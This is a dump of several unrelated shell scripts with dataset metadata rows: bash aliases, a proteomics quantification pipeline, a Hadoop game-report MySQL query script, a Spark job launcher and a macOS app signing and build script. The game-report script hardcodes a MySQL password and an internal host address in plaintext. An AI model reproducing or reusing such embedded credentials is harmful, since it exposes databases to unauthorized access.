alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
# Use Git’s colored diff when available
hash git &>/dev/null;
if [ $? -eq 0 ]; then
function diff() {
git diff --no-index --color-words "$@";
}
fi;
# Use the text that has already been typed as the prefix for searching through
# commands (i.e. more intelligent Up/Down behavior)
bind '"\e[A": history-search-backward'
bind '"\e[B": history-search-forward'
# Detect which `ls` flavor is in use
if ls --color > /dev/null 2>&1; then # GNU `ls`
colorflag="--color"
else # OS X `ls`
colorflag="-G"
fi
# Enable gulp completion
# eval "$(gulp --completion=bash)"
# Enable jump (more focused version of fasd)
# eval "$(jump shell bash)"
# List all files colorized in long format
alias l="ls -lF ${colorflag}"
# List all files colorized in long format, including dot files
alias la="ls -laF ${colorflag}"
# List only directories
alias lsd="ls -lF ${colorflag} | grep --color=never '^d'"
# List only hidden files
alias lh="ls -d .*"
# Always use color output for `ls`
alias ls="command ls ${colorflag}"
export LS_COLORS='no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.ogg=01;35:*.mp3=01;35:*.wav=01;35:'
[ -f ~/.fzf.bash ] && source ~/.fzf.bash
export N_PREFIX="$HOME/n"; [[ :$PATH: == *":$N_PREFIX/bin:"* ]] || PATH+=":$N_PREFIX/bin" # Added by n-install (see http://git.io/n-install-repo).
| true |
4689e1d8213301f832ba6a425c5b649ad5bc6408 | Shell | WYWLMayo/consolidate | /consolidate.sh | UTF-8 | 19,324 | 3.515625 | 4 | [] | no_license |
echo "Please select the Organism for database searching:"
PS3_OLD=$PS3
PS3="Please make a selection=> "; export PS3;
select Database in Mouse Human Zebra_fish None
do
case $Database in
Mouse) LB_1="Mouse";LB_2="musculus";LB_3="mouse"; DB="MM";Uniq="Mm.seq.uniq";break;;
Human) LB_1="Homo";LB_2="Human";LB_3="sapiens"; DB="HS";Uniq="Hs.seq.uniq";break;;
Zebra_fish) LB_1="ebra";LB_2="rerio";LB_3="Danio"; DB="est_others";Uniq="Dr.seq.uniq";break;;
None) break;;
*) echo "ERROR: Invalid selection, $REPLY.";;
esac
done
PS3=$PS3_OLD;
echo "Please specify the labeling system:"
PS3_OLD=$PS3
PS3="Please make a selection=> "; export PS3;
select Label in SILAC iTRAQ-4 iTRAQ-8 TMT-6 TMT-10 TMT-Pro None
do
case $Label in
SILAC) Label="SILAC"; break;;
iTRAQ-4) Label="iTRAQ-4";Iso_IntF="y"; break;;
iTRAQ-8) Label="iTRAQ-8";Iso_IntF="y"; break;;
TMT-6) Label="TMT-6";Iso_IntF="y"; break;;
TMT-10) Label="TMT-10";Iso_IntF="y"; break;;
TMT-Pro) Label="TMT-Pro";Iso_IntF="y"; break;;
None) Label="NONE"; break;;
*) echo "ERROR: Invalid selection, $REPLY.";;
esac
done
PS3=$PS3_OLD;
printf "\n" ;
_starttime=$(date +%s)
for i
do
name=${i%.*}
Time=`date +%Y-%m-%d:%H:%M:%S | awk '{split($1,t,":"); T=t[2] t[3]; gsub("-","",t[1]); print t[1] "-" T;}'`
FOLDER=`echo $name $Time | awk '{print $2 "-" $1;}'`
mkdir $FOLDER
mv $i $FOLDER
cd $FOLDER
_Iso_IntF="No";
if [ "$Iso_IntF" = "y" ]; then
echo "Would you like to apply filter for Isolation Interference?"
echo "If Yes, please specified the cutoff value. (Recommend: 30):"
echo "If No, please input "No": "
read _Iso_IntF ;
if [ "$_Iso_IntF" != "No" ]; then
echo "### Selecting spectra without Isolation Interference."
awk -F"\t" -v IsoIFN=$_Iso_IntF -v name=$name '
BEGIN { file_NoCoElut=name ".NoCoElut"; file_CoElut=name ".CoElut";}
/Sequence/ { for (fs=1; fs<=NF; fs=fs+1)
{if ($fs ~ "Interference")
{IntF=fs;
}
}
printf "%-s\n", $0 > file_NoCoElut; close(file_NoCoElut)
printf "%-s\n", $0 > file_CoElut; close(file_CoElut)
}
!/Sequence/ {if (($IntF < IsoIFN) && (length($0) > 100)) {printf "%-s\n", $0 >> file_NoCoElut; close(file_NoCoElut)}
if ($IntF >= IsoIFN) {printf "%-s\n", $0 >> file_CoElut; close(file_CoElut)}
}' $i
i=$name.NoCoElut;
CoIso=`wc -l $name.CoElut | awk '{print $1;}'`
NoCoIso=`wc -l $name.NoCoElut | awk '{print $1;}'`
echo "### $CoIso PSM with isolation interference, and $NoCoIso PSM with no or low isolation interference."
echo "### $CoIso PSMs with isolation interference, and $NoCoIso PSMs with no or low isolation interference (cutoff: $_ISO_IntF)." > $name.sumarry
else
echo "No isolation interference filter was performed." >> $name.sumarry
fi
printf "\n" ;
fi
echo "Would you like to reassign the phosphorylation sites based on phophoRS results?"
echo "If yes, please provide the cutoff score (>70 is recommended, or please input No)."
read _phRS
if [ "$_phRS" != "n" ]; then
phRS=$_phRS;
fi
printf "\n" ;
if [ "$phRS" != "No" ]; then
echo "> Re-assigning phosphorylation sites (phosphoRS - $phRS):"
## Reassign phosphosites based on phosphRS result and remove Ambiguous phosphopeptides
## if [ "$_Iso_IntF" = "No" ]; then
## /xinyanwu/MS_databases/programs/GoDaddy/phRS.assign $i > $name.phRS
## entry=`wc -l $i | awk '{print $1;}'`
## else
## /xinyanwu/MS_databases/programs/GoDaddy/phRS.assign $name.NoCoElut > $name.phRS
## entry=`wc -l $name.NoCoElut | awk '{print $1;}'`
## fi
/research/labs/proteomics/pandey/m202766/programs/phRS.assign $i $phRS > $name.phRS
entry=`wc -l $i | awk '{print $1;}'`
grep -v -w "Ambiguous" $name.phRS > $name.phRS_non
grep -w "Ambiguous" $name.phRS > $name.phRS_amb
Non_amb=`wc -l $name.phRS_non | awk '{print $1;}'`
Amb=`wc -l $name.phRS_amb | awk '{print $1;}'`
i="$name.phRS_non"
echo " $Non_amb unambiguous PSMs and $Amb ambiguous PSMs are in $entry total identified PSMS."
echo " $Non_amb unambiguous PSMs and $Amb ambiguous PSMS are in $entry total identified PSMs (phosphoRS cutoff: $phRS)." >> $name.sumarry
printf "\n";
else
echo "No phosphoRS filter is performed." >> $name.sumarry
fi
echo "> Processing quant values ($Label)."
## get information of cell names or experiment groups
awk -F"\t" '/Sequence/ {for (fs=1; fs<=NF; fs=fs+1)
{if ($fs ~ "Experiment")
{Exp=fs;
}
}
}
{split($Exp,expt,".");
if ((expt[1] !~ "Experiment") && (length(expt[1]) > 0))
{print expt[1];
}
}' $i | sort | uniq > _experiment
awk -F"\t" '/Sequence/ {for (fs=1; fs<=NF; fs=fs+1)
{if ($fs ~ "Enrichment")
{Rich=fs;
}
}
}
{split($Rich,rich,".");
if ((rich[1] !~ "Enrichment") && (length(rich[1]) > 0))
{print rich[1];
}
}' $i | sort | uniq > _enrichment
## write table head to temp a file
head -n1 $i | awk '{ printf "%-s\t%-s\t%-s\n", "Sequence_M", "File_Scan", $0;}' > _$i;
## differentiate 3-states or 2 states silac
if [ "$Label" = "SILAC" ] ; then
Label=`head -n1 $i | awk '{if ( $0 ~ "Medium") {print "SILAC-3";} else {print "SILAC-2";}}'`;
fi
## change phosphoAA labels and remove other modifications, and concatenate scan number with file name
awk -F"\t" '/Sequence/ {for (fs=1; fs<=NF; fs=fs+1)
{if (($fs == "Sequence")|| ($fs == "Annotated Sequence")) {Seq=fs;};
if ($fs == "First Scan") {scanNo=fs;}
if ($fs ~ "Spectrum File") {file=fs;}
if ($fs == "Modifications") {Modification=fs;}
if ($fs == "Sequence_Ori") {phRS="Yes"}
if ($fs == "Annotated Sequence") {version="2.0"}
if ($fs == "Enrichment") {Rich=fs}
}
}
{if ($0 !~ "Sequence")
{Sequence=$Seq;
if (phRS == "Yes")
{if (($Rich == "pY") || ($Rich == "IMAC") || ($Rich == "TiO2"))
{Sequence=$Seq; gsub("s","pS",Sequence);
gsub("t","pT",Sequence);gsub("y","pY",Sequence);
if (Sequence ~ "].")
{n=split(Sequence,pep,"."); Sequence=pep[2];
}
}
if ($Rich == "AceK")
{gsub("k","aceK",Sequence);
if (Sequence ~ "].")
{n=split(Sequence,pep,"."); Sequence=pep[2];
}
}
if ($Rich == "UbK")
{Sequence=$Seq; gsub("k","ggK",Sequence);
if (Sequence ~ "].")
{n=split(Sequence,pep,"."); Sequence=pep[2];
}
}
} else
{if (version == "2.0")
{mPh=0;
if (($Rich == "pY") || ($Rich == "IMAC") || ($Rich == "TiO2")) {PTM="Phospho"; ptm="p";}
if ($Rich == "AceK") {PTM="Acetyl"; ptm="ace";}
if ($Rich == "UbK") {PTM="GG"; ptm="gg";}
if (Sequence ~ "].")
{n=split(Sequence,pep,"."); Sequence=toupper(pep[2]);}
else {Sequence=toupper(Sequence)}
m=split($Modification,MOD,"; ");
for (i=1; i<=m; i=i+1)
{ if (MOD[i] ~ PTM)
{mPh=mPh+1; split(MOD[i],PH,"(");
PhSite[mPh]=substr(PH[1],2);
}
}
for (m=1; m<=mPh; m=m+1)
{ Sequence=substr(Sequence,1,(PhSite[m]+m-2)) ptm substr(Sequence,(PhSite[m]+m-1));
}
} else { gsub("m","M",Sequence); gsub("c","C",Sequence);
gsub("k","K",Sequence); gsub("r","R",Sequence);
gsub("s","pS",Sequence); gsub("t","pT",Sequence);
gsub("y","pY",Sequence); gsub("q","Q",Sequence);
}
}
printf "%-s\t%-s\t%-s\n", Sequence, $file $scanNo, $0;
}
}' $i >> _$i
## generate unique peptides list for query
E=`awk -F"\t" 'NR == 1 { for (fs=1;fs<=NF;fs=fs+1)
{if ($fs == "Identifying Node")
{Engine=fs; printf "%-s\t", Engine;
}
}
}
NR > 1 { if ( $Engine ~ "Mascot" ) {mascot="yes"}
if ( $Engine ~ "Sequest" ) {sequest="yes"}
}
END { if ((mascot == "yes") && (sequest == "yes"))
{ printf "%-s\n", "both"} else {printf "%-s\n", "one"}
}' _$i`
Engine=`echo "$E" | awk '{print $2}'`
EC=`echo "$E" | awk '{print $1}'`
echo $E
echo $Engine "###" $EC
if [ $Engine = "both" ]; then
head -n1 _$i > __$i
awk -F"\t" -v EC="$EC" ' NR > 1 {print $0}' _$i | sort -t $'\t' -i -r -k$EC,$EC | sort -t $'\t' -i -u -k2,2 >> __$i
cp __$i _$i
fi
awk '$0 !~ "Sequence" {print $1;}' _$i |sort|uniq > _uniqPep
## generate value of cell name or experiment groups for importing into awk programs
Exp_Name=`awk 'BEGIN {printf "%-s\t%-s\t", "Peptides", "GI";} {printf "%-s\t",$1; } END {printf "\n";}' _experiment`
## echo "$Exp_Name" , ">>>>>777777777>>>>>", $Med;
if [ "$Label" != "NONE" ]; then
## write table titles
echo "$Exp_Name" | awk -F"\t" -v Label=$Label '
{ printf "%-s\t", $1;
for (i=3; i<NF; i=i+1)
{ if (Label == "SILAC-2")
{printf "%-s\t%-s\t%-s\t%-s\t", $i "_PH", $i "_SumL", $i "_SumH", $i "_Ratio"; }
if (Label == "SILAC-3")
{printf "%-s\t%-s\t%-s\t%-s\t", $i "_PH", $i "_SumL", $i "_SumM", $i "_SumH";}
if (Label == "iTRAQ-4")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Sum114", $i "_Sum115",$i "_Sum116",$i "_Sum117";}
if (Label == "iTRAQ-8")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Sum113", $i "_Sum114", $i "_Sum115",$i "_Sum116",$i "_Sum117", $i "_Sum118",$i "_Sum119",$i "_Sum121";}
if (Label == "TMT-6")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Sum126", $i "_Sum127",$i "_Sum128",$i "_Sum129", $i "_Sum130",$i "_Sum131";}
if (Label == "TMT-10")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Sum126", $i "_Sum127N",$i "_Sum127C",$i "_Sum128N",$i "_Sum128C",$i "_Sum129N",$i "_Sum129C",$i "_Sum130N",$i "_Sum130C",$i "_Sum131";}
if (Label == "TMT-Pro")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t", $i "_PH", $i "_Sum126", $i "_Sum127N", $i "_Sum127C", $i "_Sum128N", $i "_Sum128C", $i "_Sum129N", $i "_Sum129C", $i "_Sum130N", $i "_Sum130C", $i "_Sum131N", $i "_Sum131C", $i "_Sum132N", $i "_Sum132C", $i "_Sum133N", $i "_Sum133C", $i "_Sum134N";}
printf "\n";}}' > $name\_sum.xls
echo "$Exp_Name" | awk -F"\t" -v Label=$Label '
{ printf "%-s\t", $1;
for (i=3; i<NF; i=i+1)
{ if (Label == "SILAC-2")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t", $i "_PH", $i "_SumL", $i "_AveL", $i "_cvL", $i "_SumH", $i "_AveH", $i "_cvH"; }
if (Label == "SILAC-3")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t", $i "_PH", $i "_SumL", $i "_AveL", $i "_cvL", $i "_SumM", $i "_AveM", $i "_cvM", $i "_SumH", $i "_AveH", $i "_cvH";}
if (Label == "iTRAQ-4")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t" $i "_PH", $i "_Sum114", $i "_Ave114", $i "_cv114", $i "_Sum115", $i "_Ave115", $i "_cv115", $i "_Sum116", $i "_Ave116", $i "_cv116", $i "_Sum117", $i "_Ave117", $i "_cv117";}
if (Label == "iTRAQ-8")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Sum113", $i "_Ave113", $i_cv113, $i "_Sum114", $i "_Ave114", $i "_cv114", $i "_Sum115", $i "_Ave115", $i "_cv115", $i "_Sum116", $i "_Ave116", $i "_cv116", $i "_Sum117", $i "_Ave117", $i "_cv117", $i "_Sum118", $i "_Ave118", $i "_cv118", $i "_Sum119", $i "_Ave119", $i "_cv119", $i "_Sum121", $i "_Ave121", $i "_cv121";}
if (Label == "TMT-6")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Sum126", $i "_Ave126", $i "_cv126", $i "_Sum127", $i "_Ave127", $i "_cv127", $i "_Sum128", $i "_Ave128", $i "_cv128", $i "_Sum129", $i "_Ave129", $i "_cv129", $i "_Sum130", $i "_Ave130", $i "_cv130", $i "_Sum131", $i "_Ave131", $i "_cv131";}
if (Label == "TMT-10")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Sum126", $i "_Ave126", $i "_cv126",$i "_Sum127N", $i "_Ave127N", $i "_cv127N",$i "_Sum127C", $i "_Ave127C", $i "_cv127C", $i "_Sum128N", $i "_Ave128N", $i "_cv128N", $i "_Sum128C", $i "_Ave128C", $i "_cv128C", $i "_Sum129N", $i "_Ave129N", $i "_cv129N", $i "_Sum129C", $i "_Ave129C", $i "_cv129C", $i "_Sum130N", $i "_Ave130N", $i "_cv130N", $i "_Sum130C", $i "_Ave130C", $i "_cv130C", $i "_Sum131", $i "_Ave131", $i "_cv131";}
if (Label == "TMT-Pro")
{printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Sum126", $i "_Ave126", $i "_cv126",$i "_Sum127N", $i "_Ave127N", $i "_cv127N",$i "_Sum127C", $i "_Ave127C", $i "_cv127C", $i "_Sum128N", $i "_Ave128N", $i "_cv128N", $i "_Sum128C", $i "_Ave128C", $i "_cv128C", $i "_Sum129N", $i "_Ave129N", $i "_cv129N", $i "_Sum129C", $i "_Ave129C", $i "_cv129C", $i "_Sum130N", $i "_Ave130N", $i "_cv130N", $i "_Sum130C", $i "_Ave130C", $i "_cv130C", $i "_Sum131N", $i "_Ave131N", $i "_cv131N", $i "_Sum131C", $i "_Ave131C", $i "_cv131C", $i "_Sum132N", $i "_Ave132N", $i "_cv132N", $i "_Sum132C", $i "_Ave132C", $i "_cv132C", $i "_Sum133N", $i "_Ave133N", $i "_cv133N", $i "_Sum133C", $i "_Ave133C", $i "_cv133C", $i "_Sum134N", $i "_Ave134N", $i "_cv134N";}
}
printf "\n";}' > $name\_ave.xls
## echo "$Exp_Name" | awk -F"\t" -v Label=$Label '
## { printf "%-s\t%-s\t", $1, $2;
## for (i=3; i<NF; i=i+1)
## { if (Label == "SILAC-2")
## {printf "%-s\t%-s\t%-s\t%-s\t", $i "_PH", $i "_MaxL", $i "_MaxH", $i "_Ratio"; }
## if (Label == "SILAC-3")
## {printf "%-s\t%-s\t%-s\t%-s\t", $i "_PH", $i "_MaxL", $i "_MaxM", $i "_MaxH";}
## if (Label == "iTRAQ-4")
## {printf "%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Max114", $i "_Max115",$i "_Max116",$i "_Max117";}
## if (Label == "iTRAQ-8")
## {printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Max113", $i "_Max114", $i "_Max115",$i "_Max116",$i "_Max117", $i "_Max118",$i "_Max119",$i "_Max121";}
## if (Label == "TMT-6")
## {printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Max126", $i "_Max127",$i "_Max128",$i "_Max129", $i "_Max130",$i "_Max131";}
## if (Label == "TMT-10")
## {printf "%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t%-s\t",$i "_PH", $i "_Max126", $i "_Max127N",$i "_Max127C",$i "_Max128N",$i "_Max128C",$i "_Max129N",$i "_Max129C",$i "_Max130N",$i "_Max130C",$i "_Max131";}
## }
## printf "\n";}' > $name\_max.xls
if [ "$Label" = "SILAC" ] ; then
Quant=`head -n1 _$i|awk -F"\t" '{for (fs=1; fs<=NF; fs=fs+1)
{if (($fs == "QuanResultID") || ($fs ~ "Quan Result ID"))
{quant=fs;
}
} print quant;
}'`
fi
## echo "QQQQQQQQQQQQQQ>>>>>>>>>", $Quant;
n=0;
STARTTIME=$(date +%s)
No_uniqPep=`wc -l _uniqPep| awk '{print $1;}'`
while read Line
do
head -n1 _$i > _pep
n=$(($n+1));
if [ "$Label" = "SILAC" ] ; then
LC_ALL=C fgrep -w $Line _$i | sort -t $'\t' -i -u -k2,2 | sort -t $'\t' -i -u -k $Quant,$Quant >> _pep
else
LC_ALL=C fgrep -w $Line _$i | sort -t $'\t' -i -u -k2,2 >> _pep
fi
## echo $Line "######"
## tail -n1 _pep
## echo "######"
## scan=`grep -w $Line _$i | awk '{print $2}' | sort -u`;
## grep -w $Line _$i > _pepTemp
## for SC in $scan
## do
## grep -w $SC _pepTemp |sort -t $'\t' -r -u -k $Quant,$Quant | head -n1 >> _pep
## done
awk -F"\t" -v EXP="$Exp_Name" -v Label=$Label -v file="$name" -f /research/labs/proteomics/pandey/m202766/programs/consldt_sum.awk _pep ## >> $name\_sum.xls
## awk -F"\t" -v EXP="$Exp_Name" -v Label=$Label -f /xinyanwu/MS_databases/programs/GoDaddy/consldt_ave.awk _pep >> $name\_ave.xls
## awk -F"\t" -v EXP="$Exp_Name" -v Label=$Label -f /xinyanwu/MS_databases/programs/GoDaddy/consldt_max.awk _pep >> $name\_max.xls
percent=`echo $n $No_uniqPep | awk '{printf "%0.3f", $1/$2*100}'`
CurrentTTIME=$(date +%s)
time=$(($CurrentTTIME - $STARTTIME))
Ntime=`echo $time $n $No_uniqPep |awk '{printf "%0.0f", ($3-$2)*($1/$2);}'`
((sec=time%60, m=time/60, min=m%60, hrs=m/60))
timespnt=$(printf "%02d:%02d:%02d" $hrs $min $sec)
((sec=Ntime%60, m=Ntime/60, min=m%60, hrs=m/60))
timeneed=$(printf "%02d:%02d:%02d" $hrs $min $sec)
echo -ne " \r$n/$No_uniqPep; $percent%; Spent $timespnt and need ~ $timeneed to finish."
done < _uniqPep
printf "\n\n"
echo "> Assigning phosphorylation sites based on peptide and protein sequences."
echo $DB
/research/labs/proteomics/pandey/m202766/programs/gi2gensymb2 $name\_ave.xls $DB
echo "> Merging peptides and protein information with quantification values."
/research/labs/proteomics/pandey/m202766/programs/merg $name\_Sites_T.xls
/research/labs/proteomics/pandey/m202766/programs/Site_quant $name\_Sites_T_ave.xls
fi
if [ "$Label" = "NONE" ]; then
echo "> Assigning phosphorylation sites based on peptide and protein sequences."
cp _uniqPep $name\_pep.xls
/research/labs/proteomics/pandey/m202766/programs/gi2gensymb2 $name\_pep.xls $DB
echo "> Merging peptides and protein information."
/research/labs/proteomics/pandey/m202766/programs/merg $name\_Sites_T.xls
fi
/research/labs/proteomics/pandey/m202766/programs/Site_quant $name\_Sites_T_ave.xls
## rm _*
## cd ..
done
_endtime=$(date +%s)
_time=$(($_endtime - $_starttime))
((sec=_time%60, m=_time/60, min=m%60, hrs=m/60))
_timespnt=$(printf "%02d:%02d:%02d" $hrs $min $sec)
echo -ne " \\r Takes $_timespnt to finish all consolidation procedures."
printf "\n\n";
ls
printf "\n\n";
| true |
30fe4b678132dcfaf91da90eac96aea8db5289d0 | Shell | dawnbreaks/taomee | /hadoop/game-report/eqin/webapp/hero_search_v2 | UTF-8 | 2,040 | 3.078125 | 3 | [] | no_license | #!/bin/sh
. /etc/profile
PROJECT=$1;
STARTTIME=$2
ENDTIME=$3
MIMIID=$4
GAMEZONE=$5
REMOTE_EXEC_SQL="mysql -ugamereport -pOH2%wx12KB --skip-column-names --host=192.168.71.45"
DB="hadoopdailyresult"
#YM=`echo $TIME | sed "s/-/\t/g" | awk '{print $1$2}'`
#YM=`date -d "${STARTTIME}" +%Y%m`
RESULTFILE="search_result" > $RESULTFILE
TEMPFILE="tmp" > $TEMPFILE
# search YYYYMM
# Query one month's partition of each per-player stats table and append the
# matching rows to $RESULTFILE as "col1,col2,<table>,<valA>,<valB>".
# Globals read: DB, PROJECT, MIMIID, STARTTIME, ENDTIME, REMOTE_EXEC_SQL,
# RESULTFILE. The original repeated the same pipeline six times; the table
# name, id column and awk value columns are the only differences, so drive
# one pipeline from a spec list (also drops the non-POSIX 'function'
# keyword, since this script runs under #!/bin/sh).
search()
{
    YM=$1
    # "<table-suffix> <id-column> <awk value columns>"; only HeroCmdFreqTopN
    # differs (uid key, values in columns 5 and 6).
    for spec in \
        "ItemTopN id 3 4" \
        "battletopn id 3 4" \
        "EXPTOPN id 3 4" \
        "XIAOMEETOPN id 3 4" \
        "xiaomee id 3 4" \
        "HeroCmdFreqTopN uid 5 6"
    do
        # Word-split the spec. 'set --' only rebinds this function's own
        # positional parameters; $YM was saved above.
        set -- $spec
        table=$1
        idcol=$2
        colA=$3
        colB=$4
        echo "select * from ${DB}.${PROJECT}_${table}_${YM} where ${idcol} = '${MIMIID}' and time >= '${STARTTIME}' and time <= '${ENDTIME}'" | $REMOTE_EXEC_SQL | awk -F'\t' -v t="$table" -v a="$colA" -v b="$colB" '{print $1","$2","t","$a","$b}' >> $RESULTFILE
    done
}
# First and last month partitions (YYYYMM) covered by the requested window.
SM=`date -d "${STARTTIME}" +%Y%m`
EM=`date -d "${ENDTIME}" +%Y%m`
CD=$STARTTIME
CM=0
# Query every month partition from SM through EM inclusive.
if [ $SM == $EM ] ; then
search $SM
else
search $SM
# NOTE(review): if ENDTIME precedes STARTTIME the loop condition is never
# met and this spins forever -- confirm callers always pass a valid window.
until [ $CM == $EM ]
do
CD=`date -d "$CD +1 month" +%Y%m%d`
CM=`date -d "$CD" +%Y%m`
search $CM
done
fi
# Send a final QUIT statement through the mysql client.
echo "QUIT" | $REMOTE_EXEC_SQL
# Print the absolute path of the result file for the caller.
DIR=$HOME/eqin/webapp;
echo ${DIR}/${RESULTFILE}
exit
| true |
102ec01e2ca5662b7fa4f597f51883560fb58f87 | Shell | giagulei/IReS-Platform | /asap-platform/asap-server/asapLibrary/operators/Wind_Distribution_Computation_Spark/Wind_Distribution_Computation_Spark.sh | UTF-8 | 828 | 2.546875 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# The bare '<<INFO ... INFO' here-document is attached to no command: the
# shell reads and discards it, so it serves as a block comment.
<<INFO
Author : Papaioannou Vassilis
Last update : 28/ 03/ 2016
Previous updates : 09/ 02/ 2016
Platform : ASAP IReS
Github : https://github.com/project-asap/IReS-Platform
Work package : Telecom analytics
Github : https://github.com/project-asap/telecom-analytics/blob/current/docs/PeakDetection.md
INFO
<<DESCRIPTION
DESCRIPTION
# Activate the project's Python virtualenv so spark-submit resolves its deps.
source /home/forth/asap-venv/bin/activate
echo -e "Starting typical_distribution_computation.py script for Distribution_Computation_Scala operator ..."
# Positional arguments from the IReS operator invocation.
SPARK_PORT=$1
OPERATOR=$2
REGION=$3
TIMEFRAME=$4
# NOTE(review): the two arguments above are immediately overridden by these
# hard-coded values, so $3/$4 are effectively ignored -- confirm intended.
REGION="roma"
TIMEFRAME="june-2015"
SPARK_HOME=/home/forth/asap4all/spark-1.5.2-bin-hadoop2.6
$SPARK_HOME/bin/spark-submit --master $SPARK_PORT $OPERATOR $REGION $TIMEFRAME
echo -e "... typical_distribution_computation.py script for Distribution_Computation_Scala operator ended"
| true |
036fd0e6659787025d5ca386d30963457b6ae0df | Shell | AgoraIO/API-Examples | /.github/ci/build/build_mac_ipa.sh | UTF-8 | 3,562 | 2.984375 | 3 | [
"MIT"
] | permissive | CURRENT_PATH=$PWD
# Resolve the absolute project directory from the first CLI argument.
PROJECT_PATH="$( cd "$1" && pwd )"
cd ${PROJECT_PATH} && pod install
if [ $? -eq 0 ]; then
echo " pod install success"
else
echo " pod install failed"
exit 1
fi
# Target name: last path component of the project directory.
TARGET_NAME=${PROJECT_PATH##*/}
KEYCENTER_PATH=${PROJECT_PATH}"/"${TARGET_NAME}"/Common/KeyCenter.swift"
# Build configuration
CONFIGURATION=Release
# Workspace path
APP_PATH="${PROJECT_PATH}/${TARGET_NAME}.xcworkspace"
# Xcode project settings file path
PBXPROJ_PATH="${PROJECT_PATH}/${TARGET_NAME}.xcodeproj/project.pbxproj"
echo PBXPROJ_PATH: $PBXPROJ_PATH
# Main project signing configuration; the object ids address the Debug and
# Release build-configuration entries inside project.pbxproj.
# Debug
/usr/libexec/PlistBuddy -c "Set :objects:03896D5324F8A011008593CD:buildSettings:CODE_SIGN_STYLE 'Manual'" $PBXPROJ_PATH
/usr/libexec/PlistBuddy -c "Set :objects:03896D5324F8A011008593CD:buildSettings:CODE_SIGN_IDENTITY 'Developer ID Application'" $PBXPROJ_PATH
/usr/libexec/PlistBuddy -c "Set :objects:03896D5324F8A011008593CD:buildSettings:DEVELOPMENT_TEAM 'YS397FG5PA'" $PBXPROJ_PATH
/usr/libexec/PlistBuddy -c "Set :objects:03896D5324F8A011008593CD:buildSettings:PROVISIONING_PROFILE_SPECIFIER 'apiexamplemac'" $PBXPROJ_PATH
# Release
/usr/libexec/PlistBuddy -c "Set :objects:03896D5424F8A011008593CD:buildSettings:CODE_SIGN_STYLE 'Manual'" $PBXPROJ_PATH
/usr/libexec/PlistBuddy -c "Set :objects:03896D5424F8A011008593CD:buildSettings:CODE_SIGN_IDENTITY 'Developer ID Application'" $PBXPROJ_PATH
/usr/libexec/PlistBuddy -c "Set :objects:03896D5424F8A011008593CD:buildSettings:DEVELOPMENT_TEAM 'YS397FG5PA'" $PBXPROJ_PATH
/usr/libexec/PlistBuddy -c "Set :objects:03896D5424F8A011008593CD:buildSettings:PROVISIONING_PROFILE_SPECIFIER 'apiexamplemac'" $PBXPROJ_PATH
# Update the build number
# Debug
/usr/libexec/PlistBuddy -c "Set :objects:03896D5324F8A011008593CD:buildSettings:CURRENT_PROJECT_VERSION ${BUILD_NUMBER}" $PBXPROJ_PATH
# Release
/usr/libexec/PlistBuddy -c "Set :objects:03896D5424F8A011008593CD:buildSettings:CURRENT_PROJECT_VERSION ${BUILD_NUMBER}" $PBXPROJ_PATH
# Log the APPID environment variables
echo AGORA_APP_ID:$APP_ID
echo $AGORA_APP_ID
